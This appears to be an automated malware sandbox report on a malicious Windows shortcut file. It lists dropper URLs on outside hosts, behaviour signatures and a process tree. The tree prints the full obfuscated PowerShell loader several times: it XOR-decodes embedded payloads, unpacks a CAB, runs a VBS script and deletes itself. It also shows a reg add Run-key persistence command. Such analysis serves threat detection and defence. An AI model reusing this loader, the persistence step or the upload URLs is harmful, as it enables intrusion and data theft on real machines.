6ca60e2c028afc8d8ae3209646b643aa1ae9694a3a652529afac6141c5d117ac

Analysis

max time kernel
150s
max time network
156s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
08/03/2024, 15:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

7a4a32b57bb087f3bfe0a640bd068108abb8ffe846f9fd2b5718774fc725efe3.lnk
Size

367.0MB
MD5

655893b1641565f8ea04da4d74116b8a
SHA1

ca5be2d5e6466b5726a3ada88bb9116247493501
SHA256

7a4a32b57bb087f3bfe0a640bd068108abb8ffe846f9fd2b5718774fc725efe3
SHA512

6efb7755be4ec4a4ec44e9392e8111c26c15d6b31b5f3f7775125b28cc144045271fd6463a83b2679b6fddd299cb4339517c642f0cc5d54733ba83362e30b540
SSDEEP

3072:uRrGHfOpcF/hptrdL3MbeL3b19yZFTvbzKObT01:HnrJ3Sib19yzzKZ

Score

10^/10

persistence

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://goosess.com/read/get.php?wc=iew&vf=lk0100

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://stuckss.com/upload.php

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://stuckss.com/upload.php

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://stuckss.com/upload.php

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://stuckss.com/upload.php

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://stuckss.com/list.php?f=UMLCWGSL.txt

Signatures

Blocklisted process makes network request 14 IoCs

flow	pid	Process
41	2856	powershell.exe
43	1868	powershell.exe
66	2456	powershell.exe
67	4488	powershell.exe
73	1548	powershell.exe
74	2164	powershell.exe
76	3340	powershell.exe
81	4840	powershell.exe
83	4784	powershell.exe
85	4032	powershell.exe
87	3992	powershell.exe
92	2488	powershell.exe
176	1512	powershell.exe
179	2516	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000\Control Panel\International\Geo\Nation	cmd.exe

Deletes itself 1 IoCs

pid	Process
2424	powershell.exe

Executes dropped EXE 2 IoCs

pid	Process
3820	unzip.exe
368	unzip.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchostno2 = "C:\\Users\\Public\\Documents\\start.vbs"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchostno2 = "C:\\Users\\Public\\Documents\\start.vbs"	reg.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\LOGS\DPX\setupact.log	expand.exe
File opened for modification	C:\Windows\LOGS\DPX\setuperr.log	expand.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Delays execution with timeout.exe 6 IoCs

evasion

pid	Process
3500	timeout.exe
3712	timeout.exe
2384	timeout.exe
4532	timeout.exe
4564	timeout.exe
2164	timeout.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
4484	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 47 IoCs

pid	Process
2424	powershell.exe
2424	powershell.exe
3624	powershell.exe
3624	powershell.exe
3624	powershell.exe
2856	powershell.exe
2856	powershell.exe
2856	powershell.exe
1868	powershell.exe
1868	powershell.exe
1868	powershell.exe
4488	powershell.exe
4488	powershell.exe
2456	powershell.exe
2456	powershell.exe
2456	powershell.exe
4488	powershell.exe
2164	powershell.exe
2164	powershell.exe
2164	powershell.exe
1548	powershell.exe
1548	powershell.exe
1548	powershell.exe
3340	powershell.exe
3340	powershell.exe
3340	powershell.exe
4840	powershell.exe
4840	powershell.exe
4840	powershell.exe
4784	powershell.exe
4784	powershell.exe
4784	powershell.exe
4032	powershell.exe
4032	powershell.exe
4032	powershell.exe
3992	powershell.exe
3992	powershell.exe
3992	powershell.exe
2488	powershell.exe
2488	powershell.exe
2488	powershell.exe
1512	powershell.exe
1512	powershell.exe
1512	powershell.exe
2516	powershell.exe
2516	powershell.exe
2516	powershell.exe

Suspicious use of AdjustPrivilegeToken 16 IoCs

description	pid	Process
Token: SeDebugPrivilege	2424	powershell.exe
Token: SeDebugPrivilege	3624	powershell.exe
Token: SeDebugPrivilege	2856	powershell.exe
Token: SeDebugPrivilege	1868	powershell.exe
Token: SeDebugPrivilege	4488	powershell.exe
Token: SeDebugPrivilege	2456	powershell.exe
Token: SeDebugPrivilege	2164	powershell.exe
Token: SeDebugPrivilege	1548	powershell.exe
Token: SeDebugPrivilege	3340	powershell.exe
Token: SeDebugPrivilege	4840	powershell.exe
Token: SeDebugPrivilege	4784	powershell.exe
Token: SeDebugPrivilege	4032	powershell.exe
Token: SeDebugPrivilege	3992	powershell.exe
Token: SeDebugPrivilege	2488	powershell.exe
Token: SeDebugPrivilege	1512	powershell.exe
Token: SeDebugPrivilege	2516	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4648 wrote to memory of 5016	4648	cmd.exe	91
PID 4648 wrote to memory of 5016	4648	cmd.exe	91
PID 5016 wrote to memory of 2424	5016	cmd.exe	92
PID 5016 wrote to memory of 2424	5016	cmd.exe	92
PID 2424 wrote to memory of 3916	2424	powershell.exe	93
PID 2424 wrote to memory of 3916	2424	powershell.exe	93
PID 3916 wrote to memory of 3624	3916	cmd.exe	95
PID 3916 wrote to memory of 3624	3916	cmd.exe	95
PID 2424 wrote to memory of 3908	2424	powershell.exe	96
PID 2424 wrote to memory of 3908	2424	powershell.exe	96
PID 2424 wrote to memory of 4432	2424	powershell.exe	97
PID 2424 wrote to memory of 4432	2424	powershell.exe	97
PID 2176 wrote to memory of 4636	2176	cmd.exe	101
PID 2176 wrote to memory of 4636	2176	cmd.exe	101
PID 2176 wrote to memory of 2856	2176	cmd.exe	102
PID 2176 wrote to memory of 2856	2176	cmd.exe	102
PID 3624 wrote to memory of 2376	3624	powershell.exe	103
PID 3624 wrote to memory of 2376	3624	powershell.exe	103
PID 3624 wrote to memory of 3716	3624	powershell.exe	104
PID 3624 wrote to memory of 3716	3624	powershell.exe	104
PID 1420 wrote to memory of 4888	1420	cmd.exe	107
PID 1420 wrote to memory of 4888	1420	cmd.exe	107
PID 1420 wrote to memory of 1868	1420	cmd.exe	108
PID 1420 wrote to memory of 1868	1420	cmd.exe	108
PID 2176 wrote to memory of 3820	2176	cmd.exe	114
PID 2176 wrote to memory of 3820	2176	cmd.exe	114
PID 2176 wrote to memory of 3820	2176	cmd.exe	114
PID 2176 wrote to memory of 4484	2176	cmd.exe	115
PID 2176 wrote to memory of 4484	2176	cmd.exe	115
PID 1420 wrote to memory of 368	1420	cmd.exe	120
PID 1420 wrote to memory of 368	1420	cmd.exe	120
PID 1420 wrote to memory of 368	1420	cmd.exe	120
PID 1420 wrote to memory of 3500	1420	cmd.exe	121
PID 1420 wrote to memory of 3500	1420	cmd.exe	121
PID 2176 wrote to memory of 3712	2176	cmd.exe	122
PID 2176 wrote to memory of 3712	2176	cmd.exe	122
PID 1420 wrote to memory of 2456	1420	cmd.exe	124
PID 1420 wrote to memory of 2456	1420	cmd.exe	124
PID 2176 wrote to memory of 4488	2176	cmd.exe	125
PID 2176 wrote to memory of 4488	2176	cmd.exe	125
PID 2176 wrote to memory of 2164	2176	cmd.exe	126
PID 2176 wrote to memory of 2164	2176	cmd.exe	126
PID 1420 wrote to memory of 1548	1420	cmd.exe	127
PID 1420 wrote to memory of 1548	1420	cmd.exe	127
PID 1420 wrote to memory of 3340	1420	cmd.exe	128
PID 1420 wrote to memory of 3340	1420	cmd.exe	128
PID 2176 wrote to memory of 4840	2176	cmd.exe	130
PID 2176 wrote to memory of 4840	2176	cmd.exe	130
PID 1420 wrote to memory of 4784	1420	cmd.exe	133
PID 1420 wrote to memory of 4784	1420	cmd.exe	133
PID 2176 wrote to memory of 4032	2176	cmd.exe	134
PID 2176 wrote to memory of 4032	2176	cmd.exe	134
PID 1420 wrote to memory of 3992	1420	cmd.exe	135
PID 1420 wrote to memory of 3992	1420	cmd.exe	135
PID 2176 wrote to memory of 2488	2176	cmd.exe	136
PID 2176 wrote to memory of 2488	2176	cmd.exe	136
PID 1420 wrote to memory of 3268	1420	cmd.exe	137
PID 1420 wrote to memory of 3268	1420	cmd.exe	137
PID 1420 wrote to memory of 2384	1420	cmd.exe	138
PID 1420 wrote to memory of 2384	1420	cmd.exe	138
PID 2176 wrote to memory of 4732	2176	cmd.exe	140
PID 2176 wrote to memory of 4732	2176	cmd.exe	140
PID 2176 wrote to memory of 4532	2176	cmd.exe	141
PID 2176 wrote to memory of 4532	2176	cmd.exe	141

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\7a4a32b57bb087f3bfe0a640bd068108abb8ffe846f9fd2b5718774fc725efe3.lnk
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4648
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c p^owe^rshe^l^l -windowstyle hidden function QceEeRCSkI{param($UHCYbGzPEWQZ); ^<#missible#^>$oPath = Split-Path $UHCYbGzPEWQZ;^<#rewwore#^> return $oPath;};function MHMPpQGMSz{param($YCevQqmRGu); ^<#biophysically#^>$oPath = $YCevQqmRGu.substring(0,$YCevQqmRGu.length-4) + ''; ^<#bawling#^>return $oPath;};function GzAaIfXbMpmZ{$knPgzVjIuN = $env:public^<#edginesses#^> + '\' + 'UHCYbG.cab';^<#koranic#^> return $knPgzVjIuN;};function YLfJLrHwhVv{$jHCBAmkIQGt = $env:public^<#stampman#^> + '\' +^<#shatan#^> 'documents';^<#unimproved#^> return $jHCBAmkIQGt;};function IgnDoFlYXTz{$YDczVPCcDt = $env:public^<#porphyrize#^>+'\documents\start.vbs';^<#blameably#^> return $YDczVPCcDt;};function vnQykamhms{param($zQAJWCjcuWU);^<#unmodifiability#^> remove-item ^<#syndactylous#^> -path $zQAJWCjcuWU ^<#merohedral#^> -force;};function koMIoWakvBvW{param($FMGlWEFVsTs, $esLEposvvv);^<#tonite#^> expand $FMGlWEFVsTs ^<#decomponible#^> -F:* $esLEposvvv;};function hTyCsnXOYNpF{param($nawJOUnZzx,$RlTnDPsUBfVC,$eCNSSCoWDgl,$OmElfdBcJuP,$bzaDdFrZDQ);^<#discostomatous#^> $riBeXSGLoac=New-Object System.IO.FileStream(^<#copiable#^>$nawJOUnZzx,^<#strickenly#^>[System.IO.FileMode]::Open,^<#judicialness#^>[System.IO.FileAccess]::Read);^<#cadencing#^> $riBeXSGLoac.Seek(^<#jassid#^>$RlTnDPsUBfVC,[System.IO.SeekOrigin]::Begin);^<#destool#^> $lDWtpafJUDLQ=New-Object byte[] ^<#astatize#^>$eCNSSCoWDgl; ^<#broadax#^>$riBeXSGLoac.Read(^<#thiamines#^>$lDWtpafJUDLQ,0,^<#transpirometer#^>$eCNSSCoWDgl); $riBeXSGLoac.Close();for($EghEJyXHpIU=0;$EghEJyXHpIU -lt $eCNSSCoWDgl;$EghEJyXHpIU++){^<#electrotype#^>$lDWtpafJUDLQ[$EghEJyXHpIU]=$lDWtpafJUDLQ[$EghEJyXHpIU] -bxor $OmElfdBcJuP;}^<#sulfite#^> sc $bzaDdFrZDQ ^<#mouchoirs#^> $lDWtpafJUDLQ -Encoding ^<#overornamented#^> Byte;};function JLaLxKrqVQ{return Get-Location;};function FbVgDFIBFQY{^<#ransomfree#^>return $env:Temp;};function YzJlSxYuyv{$pPYxTUXWGppn = JLaLxKrqVQ; $MCMgQbotQbA = dvhYabCyYgb -MdzNcJucvkR $pPYxTUXWGppn; ^<#reoccurrences#^>if($MCMgQbotQbA.length -eq 0) {$pPYxTUXWGppn = FbVgDFIBFQY; ^<#philippicize#^>$MCMgQbotQbA = dvhYabCyYgb -MdzNcJucvkR $pPYxTUXWGppn;} return $MCMgQbotQbA;};function dvhYabCyYgb{param($MdzNcJucvkR); ^<#krises#^>$outpath=Get-ChildItem -Path ^<#tuckered#^> $MdzNcJucvkR -Recurse ^<#gunline#^>*.lnk ^| ^<#lavishes#^>where-object {$_.length -eq ^<#herbbane#^>0x16EF7F1A} ^| ^<#polymazia#^>Select-Object -ExpandProperty ^<#mailes#^>FullName; return ^<#boronic#^> $outpath;};$BVhUaiRxai = YzJlSxYuyv;^<#rhinolithic#^>$dirPath = QceEeRCSkI -UHCYbGzPEWQZ $BVhUaiRxai;^<#potline#^> $utUjrvVHil = MHMPpQGMSz -YCevQqmRGu $BVhUaiRxai;hTyCsnXOYNpF -nawJOUnZzx ^<#typhonia#^> $BVhUaiRxai -RlTnDPsUBfVC ^<#underemployment#^> 0x000020EC -eCNSSCoWDgl 0x00006B92 -OmElfdBcJuP ^<#prefiguratively#^> 0x51 -bzaDdFrZDQ ^<#gallinae#^> $utUjrvVHil;^<#appd#^> ^& $utUjrvVHil;$ipSanAloserA=GzAaIfXbMpmZ;^<#superchery#^>hTyCsnXOYNpF -nawJOUnZzx ^<#dioon#^> $BVhUaiRxai -RlTnDPsUBfVC ^<#taxation#^> 0x00008C7E -eCNSSCoWDgl ^<#skeens#^> 0x00013CCF -OmElfdBcJuP ^<#brooch#^> 0x88 -bzaDdFrZDQ ^<#unreckingness#^> $ipSanAloserA;^<#anthypophoretic#^>vnQykamhms -zQAJWCjcuWU $BVhUaiRxai;$TAsjCZBdLsHU = YLfJLrHwhVv;^<#narthexes#^>koMIoWakvBvW -FMGlWEFVsTs $ipSanAloserA -esLEposvvv ^<#britten#^>$TAsjCZBdLsHU;^<#phenylephrine#^>vnQykamhms -zQAJWCjcuWU $ipSanAloserA;$nQPICdrwsspp = ^<#crackback#^>IgnDoFlYXTz;^<#orientationally#^>^& $nQPICdrwsspp;
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5016
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -windowstyle hidden function QceEeRCSkI{param($UHCYbGzPEWQZ); <#missible#>$oPath = Split-Path $UHCYbGzPEWQZ;<#rewwore#> return $oPath;};function MHMPpQGMSz{param($YCevQqmRGu); <#biophysically#>$oPath = $YCevQqmRGu.substring(0,$YCevQqmRGu.length-4) + ''; <#bawling#>return $oPath;};function GzAaIfXbMpmZ{$knPgzVjIuN = $env:public<#edginesses#> + '\' + 'UHCYbG.cab';<#koranic#> return $knPgzVjIuN;};function YLfJLrHwhVv{$jHCBAmkIQGt = $env:public<#stampman#> + '\' +<#shatan#> 'documents';<#unimproved#> return $jHCBAmkIQGt;};function IgnDoFlYXTz{$YDczVPCcDt = $env:public<#porphyrize#>+'\documents\start.vbs';<#blameably#> return $YDczVPCcDt;};function vnQykamhms{param($zQAJWCjcuWU);<#unmodifiability#> remove-item <#syndactylous#> -path $zQAJWCjcuWU <#merohedral#> -force;};function koMIoWakvBvW{param($FMGlWEFVsTs, $esLEposvvv);<#tonite#> expand $FMGlWEFVsTs <#decomponible#> -F:* $esLEposvvv;};function hTyCsnXOYNpF{param($nawJOUnZzx,$RlTnDPsUBfVC,$eCNSSCoWDgl,$OmElfdBcJuP,$bzaDdFrZDQ);<#discostomatous#> $riBeXSGLoac=New-Object System.IO.FileStream(<#copiable#>$nawJOUnZzx,<#strickenly#>[System.IO.FileMode]::Open,<#judicialness#>[System.IO.FileAccess]::Read);<#cadencing#> $riBeXSGLoac.Seek(<#jassid#>$RlTnDPsUBfVC,[System.IO.SeekOrigin]::Begin);<#destool#> $lDWtpafJUDLQ=New-Object byte[] <#astatize#>$eCNSSCoWDgl; <#broadax#>$riBeXSGLoac.Read(<#thiamines#>$lDWtpafJUDLQ,0,<#transpirometer#>$eCNSSCoWDgl); $riBeXSGLoac.Close();for($EghEJyXHpIU=0;$EghEJyXHpIU -lt $eCNSSCoWDgl;$EghEJyXHpIU++){<#electrotype#>$lDWtpafJUDLQ[$EghEJyXHpIU]=$lDWtpafJUDLQ[$EghEJyXHpIU] -bxor $OmElfdBcJuP;}<#sulfite#> sc $bzaDdFrZDQ <#mouchoirs#> $lDWtpafJUDLQ -Encoding <#overornamented#> Byte;};function JLaLxKrqVQ{return Get-Location;};function FbVgDFIBFQY{<#ransomfree#>return $env:Temp;};function YzJlSxYuyv{$pPYxTUXWGppn = JLaLxKrqVQ; $MCMgQbotQbA = dvhYabCyYgb -MdzNcJucvkR $pPYxTUXWGppn; <#reoccurrences#>if($MCMgQbotQbA.length -eq 0) {$pPYxTUXWGppn = FbVgDFIBFQY; <#philippicize#>$MCMgQbotQbA = dvhYabCyYgb -MdzNcJucvkR $pPYxTUXWGppn;} return $MCMgQbotQbA;};function dvhYabCyYgb{param($MdzNcJucvkR); <#krises#>$outpath=Get-ChildItem -Path <#tuckered#> $MdzNcJucvkR -Recurse <#gunline#>*.lnk | <#lavishes#>where-object {$_.length -eq <#herbbane#>0x16EF7F1A} | <#polymazia#>Select-Object -ExpandProperty <#mailes#>FullName; return <#boronic#> $outpath;};$BVhUaiRxai = YzJlSxYuyv;<#rhinolithic#>$dirPath = QceEeRCSkI -UHCYbGzPEWQZ $BVhUaiRxai;<#potline#> $utUjrvVHil = MHMPpQGMSz -YCevQqmRGu $BVhUaiRxai;hTyCsnXOYNpF -nawJOUnZzx <#typhonia#> $BVhUaiRxai -RlTnDPsUBfVC <#underemployment#> 0x000020EC -eCNSSCoWDgl 0x00006B92 -OmElfdBcJuP <#prefiguratively#> 0x51 -bzaDdFrZDQ <#gallinae#> $utUjrvVHil;<#appd#> & $utUjrvVHil;$ipSanAloserA=GzAaIfXbMpmZ;<#superchery#>hTyCsnXOYNpF -nawJOUnZzx <#dioon#> $BVhUaiRxai -RlTnDPsUBfVC <#taxation#> 0x00008C7E -eCNSSCoWDgl <#skeens#> 0x00013CCF -OmElfdBcJuP <#brooch#> 0x88 -bzaDdFrZDQ <#unreckingness#> $ipSanAloserA;<#anthypophoretic#>vnQykamhms -zQAJWCjcuWU $BVhUaiRxai;$TAsjCZBdLsHU = YLfJLrHwhVv;<#narthexes#>koMIoWakvBvW -FMGlWEFVsTs $ipSanAloserA -esLEposvvv <#britten#>$TAsjCZBdLsHU;<#phenylephrine#>vnQykamhms -zQAJWCjcuWU $ipSanAloserA;$nQPICdrwsspp = <#crackback#>IgnDoFlYXTz;<#orientationally#>& $nQPICdrwsspp;
    3⤵
    - Deletes itself
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2424
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c p^owe^rshe^l^l -windowstyle hidden function QceEeRCSkI{param($UHCYbGzPEWQZ); ^<#missible#^>$oPath = Split-Path $UHCYbGzPEWQZ;^<#rewwore#^> return $oPath;};function MHMPpQGMSz{param($YCevQqmRGu); ^<#biophysically#^>$oPath = $YCevQqmRGu.substring(0,$YCevQqmRGu.length-4) + ''; ^<#bawling#^>return $oPath;};function GzAaIfXbMpmZ{$knPgzVjIuN = $env:public^<#edginesses#^> + '\' + 'UHCYbG.cab';^<#koranic#^> return $knPgzVjIuN;};function YLfJLrHwhVv{$jHCBAmkIQGt = $env:public^<#stampman#^> + '\' +^<#shatan#^> 'documents';^<#unimproved#^> return $jHCBAmkIQGt;};function IgnDoFlYXTz{$YDczVPCcDt = $env:public^<#porphyrize#^>+'\documents\start.vbs';^<#blameably#^> return $YDczVPCcDt;};function vnQykamhms{param($zQAJWCjcuWU);^<#unmodifiability#^> remove-item ^<#syndactylous#^> -path $zQAJWCjcuWU ^<#merohedral#^> -force;};function koMIoWakvBvW{param($FMGlWEFVsTs, $esLEposvvv);^<#tonite#^> expand $FMGlWEFVsTs ^<#decomponible#^> -F:* $esLEposvvv;};function hTyCsnXOYNpF{param($nawJOUnZzx,$RlTnDPsUBfVC,$eCNSSCoWDgl,$OmElfdBcJuP,$bzaDdFrZDQ);^<#discostomatous#^> $riBeXSGLoac=New-Object System.IO.FileStream(^<#copiable#^>$nawJOUnZzx,^<#strickenly#^>[System.IO.FileMode]::Open,^<#judicialness#^>[System.IO.FileAccess]::Read);^<#cadencing#^> $riBeXSGLoac.Seek(^<#jassid#^>$RlTnDPsUBfVC,[System.IO.SeekOrigin]::Begin);^<#destool#^> $lDWtpafJUDLQ=New-Object byte[] ^<#astatize#^>$eCNSSCoWDgl; ^<#broadax#^>$riBeXSGLoac.Read(^<#thiamines#^>$lDWtpafJUDLQ,0,^<#transpirometer#^>$eCNSSCoWDgl); $riBeXSGLoac.Close();for($EghEJyXHpIU=0;$EghEJyXHpIU -lt $eCNSSCoWDgl;$EghEJyXHpIU++){^<#electrotype#^>$lDWtpafJUDLQ[$EghEJyXHpIU]=$lDWtpafJUDLQ[$EghEJyXHpIU] -bxor $OmElfdBcJuP;}^<#sulfite#^> sc $bzaDdFrZDQ ^<#mouchoirs#^> $lDWtpafJUDLQ -Encoding ^<#overornamented#^> Byte;};function JLaLxKrqVQ{return Get-Location;};function FbVgDFIBFQY{^<#ransomfree#^>return $env:Temp;};function YzJlSxYuyv{$pPYxTUXWGppn = JLaLxKrqVQ; $MCMgQbotQbA = dvhYabCyYgb -MdzNcJucvkR $pPYxTUXWGppn; ^<#reoccurrences#^>if($MCMgQbotQbA.length -eq 0) {$pPYxTUXWGppn = FbVgDFIBFQY; ^<#philippicize#^>$MCMgQbotQbA = dvhYabCyYgb -MdzNcJucvkR $pPYxTUXWGppn;} return $MCMgQbotQbA;};function dvhYabCyYgb{param($MdzNcJucvkR); ^<#krises#^>$outpath=Get-ChildItem -Path ^<#tuckered#^> $MdzNcJucvkR -Recurse ^<#gunline#^>*.lnk ^| ^<#lavishes#^>where-object {$_.length -eq ^<#herbbane#^>0x16EF7F1A} ^| ^<#polymazia#^>Select-Object -ExpandProperty ^<#mailes#^>FullName; return ^<#boronic#^> $outpath;};$BVhUaiRxai = YzJlSxYuyv;^<#rhinolithic#^>$dirPath = QceEeRCSkI -UHCYbGzPEWQZ $BVhUaiRxai;^<#potline#^> $utUjrvVHil = MHMPpQGMSz -YCevQqmRGu $BVhUaiRxai;hTyCsnXOYNpF -nawJOUnZzx ^<#typhonia#^> $BVhUaiRxai -RlTnDPsUBfVC ^<#underemployment#^> 0x000020EC -eCNSSCoWDgl 0x00006B92 -OmElfdBcJuP ^<#prefiguratively#^> 0x51 -bzaDdFrZDQ ^<#gallinae#^> $utUjrvVHil;^<#appd#^> ^& $utUjrvVHil;$ipSanAloserA=GzAaIfXbMpmZ;^<#superchery#^>hTyCsnXOYNpF -nawJOUnZzx ^<#dioon#^> $BVhUaiRxai -RlTnDPsUBfVC ^<#taxation#^> 0x00008C7E -eCNSSCoWDgl ^<#skeens#^> 0x00013CCF -OmElfdBcJuP ^<#brooch#^> 0x88 -bzaDdFrZDQ ^<#unreckingness#^> $ipSanAloserA;^<#anthypophoretic#^>vnQykamhms -zQAJWCjcuWU $BVhUaiRxai;$TAsjCZBdLsHU = YLfJLrHwhVv;^<#narthexes#^>koMIoWakvBvW -FMGlWEFVsTs $ipSanAloserA -esLEposvvv ^<#britten#^>$TAsjCZBdLsHU;^<#phenylephrine#^>vnQykamhms -zQAJWCjcuWU $ipSanAloserA;$nQPICdrwsspp = ^<#crackback#^>IgnDoFlYXTz;^<#orientationally#^>^& $nQPICdrwsspp;
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3916
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -windowstyle hidden function QceEeRCSkI{param($UHCYbGzPEWQZ); <#missible#>$oPath = Split-Path $UHCYbGzPEWQZ;<#rewwore#> return $oPath;};function MHMPpQGMSz{param($YCevQqmRGu); <#biophysically#>$oPath = $YCevQqmRGu.substring(0,$YCevQqmRGu.length-4) + ''; <#bawling#>return $oPath;};function GzAaIfXbMpmZ{$knPgzVjIuN = $env:public<#edginesses#> + '\' + 'UHCYbG.cab';<#koranic#> return $knPgzVjIuN;};function YLfJLrHwhVv{$jHCBAmkIQGt = $env:public<#stampman#> + '\' +<#shatan#> 'documents';<#unimproved#> return $jHCBAmkIQGt;};function IgnDoFlYXTz{$YDczVPCcDt = $env:public<#porphyrize#>+'\documents\start.vbs';<#blameably#> return $YDczVPCcDt;};function vnQykamhms{param($zQAJWCjcuWU);<#unmodifiability#> remove-item <#syndactylous#> -path $zQAJWCjcuWU <#merohedral#> -force;};function koMIoWakvBvW{param($FMGlWEFVsTs, $esLEposvvv);<#tonite#> expand $FMGlWEFVsTs <#decomponible#> -F:* $esLEposvvv;};function hTyCsnXOYNpF{param($nawJOUnZzx,$RlTnDPsUBfVC,$eCNSSCoWDgl,$OmElfdBcJuP,$bzaDdFrZDQ);<#discostomatous#> $riBeXSGLoac=New-Object System.IO.FileStream(<#copiable#>$nawJOUnZzx,<#strickenly#>[System.IO.FileMode]::Open,<#judicialness#>[System.IO.FileAccess]::Read);<#cadencing#> $riBeXSGLoac.Seek(<#jassid#>$RlTnDPsUBfVC,[System.IO.SeekOrigin]::Begin);<#destool#> $lDWtpafJUDLQ=New-Object byte[] <#astatize#>$eCNSSCoWDgl; <#broadax#>$riBeXSGLoac.Read(<#thiamines#>$lDWtpafJUDLQ,0,<#transpirometer#>$eCNSSCoWDgl); $riBeXSGLoac.Close();for($EghEJyXHpIU=0;$EghEJyXHpIU -lt $eCNSSCoWDgl;$EghEJyXHpIU++){<#electrotype#>$lDWtpafJUDLQ[$EghEJyXHpIU]=$lDWtpafJUDLQ[$EghEJyXHpIU] -bxor $OmElfdBcJuP;}<#sulfite#> sc $bzaDdFrZDQ <#mouchoirs#> $lDWtpafJUDLQ -Encoding <#overornamented#> Byte;};function JLaLxKrqVQ{return Get-Location;};function FbVgDFIBFQY{<#ransomfree#>return $env:Temp;};function YzJlSxYuyv{$pPYxTUXWGppn = JLaLxKrqVQ; $MCMgQbotQbA = dvhYabCyYgb -MdzNcJucvkR $pPYxTUXWGppn; <#reoccurrences#>if($MCMgQbotQbA.length -eq 0) {$pPYxTUXWGppn = FbVgDFIBFQY; <#philippicize#>$MCMgQbotQbA = dvhYabCyYgb -MdzNcJucvkR $pPYxTUXWGppn;} return $MCMgQbotQbA;};function dvhYabCyYgb{param($MdzNcJucvkR); <#krises#>$outpath=Get-ChildItem -Path <#tuckered#> $MdzNcJucvkR -Recurse <#gunline#>*.lnk | <#lavishes#>where-object {$_.length -eq <#herbbane#>0x16EF7F1A} | <#polymazia#>Select-Object -ExpandProperty <#mailes#>FullName; return <#boronic#> $outpath;};$BVhUaiRxai = YzJlSxYuyv;<#rhinolithic#>$dirPath = QceEeRCSkI -UHCYbGzPEWQZ $BVhUaiRxai;<#potline#> $utUjrvVHil = MHMPpQGMSz -YCevQqmRGu $BVhUaiRxai;hTyCsnXOYNpF -nawJOUnZzx <#typhonia#> $BVhUaiRxai -RlTnDPsUBfVC <#underemployment#> 0x000020EC -eCNSSCoWDgl 0x00006B92 -OmElfdBcJuP <#prefiguratively#> 0x51 -bzaDdFrZDQ <#gallinae#> $utUjrvVHil;<#appd#> & $utUjrvVHil;$ipSanAloserA=GzAaIfXbMpmZ;<#superchery#>hTyCsnXOYNpF -nawJOUnZzx <#dioon#> $BVhUaiRxai -RlTnDPsUBfVC <#taxation#> 0x00008C7E -eCNSSCoWDgl <#skeens#> 0x00013CCF -OmElfdBcJuP <#brooch#> 0x88 -bzaDdFrZDQ <#unreckingness#> $ipSanAloserA;<#anthypophoretic#>vnQykamhms -zQAJWCjcuWU $BVhUaiRxai;$TAsjCZBdLsHU = YLfJLrHwhVv;<#narthexes#>koMIoWakvBvW -FMGlWEFVsTs $ipSanAloserA -esLEposvvv <#britten#>$TAsjCZBdLsHU;<#phenylephrine#>vnQykamhms -zQAJWCjcuWU $ipSanAloserA;$nQPICdrwsspp = <#crackback#>IgnDoFlYXTz;<#orientationally#>& $nQPICdrwsspp;
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3624
      - C:\Windows\system32\expand.exe
        
        "C:\Windows\system32\expand.exe" C:\Users\Public\UHCYbG.cab -F:* C:\Users\Public\documents
        6⤵
        
        PID:2376
      - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Public\documents\start.vbs"
        6⤵
        
        PID:3716
  - - C:\Windows\system32\expand.exe
      "C:\Windows\system32\expand.exe" C:\Users\Public\UHCYbG.cab -F:* C:\Users\Public\documents
      4⤵
      Drops file in Windows directory
      PID:3908
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Public\documents\start.vbs"
      4⤵
      PID:4432

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\documents\49120862.bat" "
1⤵
- Suspicious use of WriteProcessMemory
PID:2176
- C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v svchostno2 /t REG_SZ /d "C:\Users\Public\Documents\start.vbs" /f
  2⤵
  - Adds Run key to start application
  PID:4636
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
